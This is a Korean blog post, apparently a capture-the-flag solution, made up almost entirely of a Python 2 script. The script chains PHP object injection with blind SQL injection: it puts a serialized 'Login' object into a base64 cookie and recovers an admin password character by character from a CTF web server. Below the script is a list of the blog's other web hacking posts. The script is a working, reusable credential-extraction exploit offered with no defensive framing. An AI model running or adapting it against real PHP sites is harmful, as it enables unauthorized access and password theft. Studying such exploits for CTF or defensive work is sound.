#!/usr/bin/python ######################################## ###PHP Object Injection+SQL Injection### ######################################## from base64 import * import StringIO import pycurl import time key="" def serial(s): slen=len(s)+1 return b64encode("""O:5:"Login":1:{s:12:"\x00Login\x00table";s:%d:"%s#";}"""% (slen,s)) print "Start!" curl = pycurl.Curl() attackurl="http://web.camsctf.com/f/admin.php" #sqL+%bj3c7!=FuN for i in range(1,20): #length for loop in range(127,32,-1): SC = StringIO.StringIO() header= ["Cookie:data=%s"%serial("login where username='admin' and if(ord(substr(password,%d,1))=%d,1,0)"%(i,loop))] curl.setopt(pycurl.URL, attackurl) curl.setopt(pycurl.HTTPHEADER, header) curl.setopt(pycurl.WRITEFUNCTION, SC.write) curl.setopt(pycurl.FOLLOWLOCATION,1) try: curl.perform() html = SC.getvalue() if(html=="1"): key+=chr(loop) break SC.close() except Exception, e: print "Exception : %s"% e print key
반응형
'웹해킹' 카테고리의 다른 글
크롬 임시파일 경로 (0) | 2020.06.16 |
---|---|
SQL injection Skill Note (0) | 2013.09.15 |
New SQL Injection Site (2) | 2013.01.31 |
Webhacking.kr 기념스샷! (4) | 2012.12.17 |
[Webhacking.kr] Problem 2 (0) | 2012.12.16 |
댓글